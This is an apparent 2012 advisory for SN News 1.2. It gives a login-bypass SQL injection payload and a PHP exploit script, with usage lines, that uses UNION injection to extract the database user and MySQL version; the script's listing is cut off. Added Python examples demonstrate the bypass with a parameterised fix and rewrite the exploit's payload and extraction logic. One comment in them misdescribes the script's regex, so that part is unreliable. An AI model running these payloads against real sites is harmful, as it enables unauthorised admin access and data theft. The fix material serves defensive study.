SN News <= 1.2 admin authentication bypass and SQL injection vulnerability advisory - the black bar safety net

2012-06-13T00:00:00
ID MYHACK58:62201234103
Type myhack58
Reporter Anonymous
Modified 2012-06-13T00:00:00

Description

SN News <= 1.2 (/admin/logar.php) Admin Bypass / Remote SQL Injection Vulnerability

Affected version: 1.2

Download address: http://phpbrasil.com/script/JHnpFRmSBqlf/sn-news

The author is not responsible for any harm caused by this information.

########################################################################

The defect is located in /admin/logar.php, lines 4-15:

4.  $login = $_POST["login"];
5.  $senha = $_POST["senha"];
6.  $sql = "select * from news_adm where login='$login' AND senha='$senha'";
7.  $query = mysql_query($sql);
8.  $nr = mysql_num_rows($query);
9.  if($nr>0){
10.     $_SESSION["admin"] = "on";
11.     echo "<script>
12.     location.href='../'
13.     </script>
14.     ";
15. }

Comment:

As you can see, there is no validation or filtering of the variables $login and $senha: they are taken straight from $_POST (lines 4-5).

See line 6: both values are concatenated into the query string, so the SQL statement can be altered through $login and $senha. Because the only check is that at least one row comes back (line 9), any input that makes the WHERE clause true for some row grants the admin session.

SQL Injection PoC:

http://www.xxx.com/sn_news/admin/login.htm

Login: 'or '1'='1

Senha: 'or '1'='1

With these values the query on line 6 becomes select * from news_adm where login=''or '1'='1' AND senha=''or '1'='1', which is true for every row of news_adm, so mysql_num_rows() is non-zero and the injection bypasses the admin login screen.
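The following is an added example, not code from the advisory or from SN News: it reproduces the logic of logar.php lines 4-15 against an in-memory SQLite database so the effect of the 'or '1'='1 payload can be observed, and places the parameterised form of the same query beside it. The news_adm table layout (login and senha columns) and the single seeded row are constructed for the demo; the advisory does not show the real schema.

```python
"""Added example: the logar.php login check, vulnerable and hardened, run
against a constructed SQLite table so the bypass is observable offline."""
import sqlite3

# Constructed schema and data; the real news_adm layout is not in the advisory.
CONN = sqlite3.connect(":memory:")
CONN.execute("CREATE TABLE news_adm (id INTEGER PRIMARY KEY, login TEXT, senha TEXT)")
CONN.execute("INSERT INTO news_adm (login, senha) VALUES ('admin', 's3cret')")
CONN.commit()

# The exact payload from the advisory's PoC.
PAYLOAD = "'or '1'='1"


def build_vulnerable_query(login: str, senha: str) -> str:
    """Line 6 of logar.php: user input interpolated straight into the SQL text."""
    return f"select * from news_adm where login='{login}' AND senha='{senha}'"


def vulnerable_login(login: str, senha: str) -> bool:
    """Lines 6-9: the session is granted whenever the row count is non-zero,
    so any input that makes the WHERE clause a tautology logs in."""
    rows = CONN.execute(build_vulnerable_query(login, senha)).fetchall()
    return len(rows) > 0


def safe_login(login: str, senha: str) -> bool:
    """Parameterised form: the input is bound as data, never parsed as SQL.
    (The plaintext senha comparison is kept only to mirror the original;
    a real fix also stores a password hash and compares with a verifier.)"""
    rows = CONN.execute(
        "select * from news_adm where login=? AND senha=?", (login, senha)
    ).fetchall()
    return len(rows) > 0


if __name__ == "__main__":
    print(build_vulnerable_query(PAYLOAD, PAYLOAD))
    print("vulnerable login with payload:", vulnerable_login(PAYLOAD, PAYLOAD))
    print("parameterised login with payload:", safe_login(PAYLOAD, PAYLOAD))
```

In the PHP original the equivalent fix is a prepared statement (mysqli or PDO with bound parameters) in place of the mysql_query() string on line 6, together with password_hash()/password_verify() instead of comparing senha in the WHERE clause; the mysql_* functions the script relies on were removed in PHP 7.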

Title: SN News <= 1.2 SQL Injection

<?php
/*
Example:
$ php mnews.php http://www.xxx.com/scripts/mnews/
*/
error_reporting(E_ERROR);
set_time_limit(0);
@ini_set("default_socket_timeout", 30);

// Encode a string as a MySQL 0x... literal so it can be placed in the
// injected query without any quote characters.
function hex($string){
    $hex = ""; // PHP 'Dim' =]
    for ($i=0; $i < strlen($string); $i++){
        $hex .= dechex(ord($string[$i]));
    }
    return '0x'.$hex;
}

echo "\nSN News <= 1.2 SQL Injection exploit\n";
echo "Discovered and written by WhiteCollarGroup\n";
echo "www.wcgroup.host56.com - whitecollar_group@hotmail.com\n\n";

if($argc != 2) {
    echo "Usage: \n";
    echo "php $argv[0] <target url>\n";
    echo "Example:\n";
    echo "php $argv[0] http://www.website.com/snnews\n";
    exit;
}

$target = $argv[1];
if(substr($target, (strlen($target)-1)) != "/") {
    $target .= "/";
}

// Injection point: the id parameter of visualiza.php. -0' closes the string
// literal in the original WHERE clause and matches no real row, so only the
// UNION row is rendered.
$inject = $target . "visualiza.php?id=-0'%20";

// Random marker, hex-encoded, used to delimit the extracted values in the page.
$token = uniqid();
$token_hex = hex($token);

echo "[*] Trying to get informations...\n";
$infos = file_get_contents($inject . urlencode("union all select 1,concat(".$token_hex.",user(),".$token_hex.",version(),".$token_hex."),3,4,5-- "));
$infos_r = array();
// Capture everything between the three copies of the marker.
preg_match_all("/$token(.*)$token(.*)$token/", $infos, $infos_r);
$user = $infos_r[1][0];
$version = $infos_r[2][0];
echo "[+] Database user: $user\n";
echo "[+] MySQL version: $version\n";
// The listing is truncated at this point in the source.
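The following is an added example, not part of the advisory or of the WhiteCollarGroup script, rewriting in Python the three pieces of the exploit that can be checked offline: the hex() helper that turns the marker into a quote-free 0x... literal, the assembly of the visualiza.php?id=-0' request URL, and the marker-delimited extraction of user() and version() from the response. The response body used below is constructed, and the column count of five is taken from the exploit's own "union all select 1,...,3,4,5".

```python
"""Added example: marker-based extraction as used by the SN News exploit,
with a constructed response body so it can be exercised without a target."""
import re
import uuid
from typing import Optional, Tuple
from urllib.parse import quote_plus


def mysql_hex_literal(s: str) -> str:
    """Equivalent of the script's hex(): '0x' followed by each byte in hex.
    Python's .hex() zero-pads every byte; PHP's dechex(ord()) does not, which
    is harmless for uniqid() output (hex digits only, all >= 0x30) but would
    corrupt the literal for bytes below 0x10."""
    return "0x" + s.encode().hex()


def build_union_payload(target: str, token: str) -> str:
    """Request URL that makes visualiza.php render user() and version()
    wrapped in the marker."""
    t = mysql_hex_literal(token)
    sql = f"union all select 1,concat({t},user(),{t},version(),{t}),3,4,5-- "
    if not target.endswith("/"):
        target += "/"
    # -0' closes the string literal in the original WHERE clause and selects
    # no real row. quote_plus() matches PHP urlencode() (space becomes '+').
    return target + "visualiza.php?id=-0'%20" + quote_plus(sql)


def extract_marked_values(body: str, token: str) -> Optional[Tuple[str, str]]:
    """The preg_match_all() step. The script's pattern uses (.), which captures
    exactly one character and therefore only matches one-character values;
    a non-greedy (.*?) is used here so values of any length are recovered."""
    t = re.escape(token)
    m = re.search(f"{t}(.*?){t}(.*?){t}", body, re.S)
    return (m.group(1), m.group(2)) if m else None


# Constructed stand-in for the page visualiza.php would return.
DEMO_TOKEN = "4fbf2a1c9d7e3"
DEMO_BODY = (
    "<html><body><h1>"
    + DEMO_TOKEN + "snnews@localhost" + DEMO_TOKEN + "5.1.41-3" + DEMO_TOKEN
    + "</h1></body></html>"
)


if __name__ == "__main__":
    token = uuid.uuid4().hex[:13]  # same role as PHP's uniqid()
    print(build_union_payload("http://www.xxx.com/sn_news", token))
    print(extract_marked_values(DEMO_BODY, DEMO_TOKEN))
```

The marker trick is what makes blind-free extraction robust: the values land somewhere inside the article template, and searching for three copies of a random token is independent of how the page is laid out.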
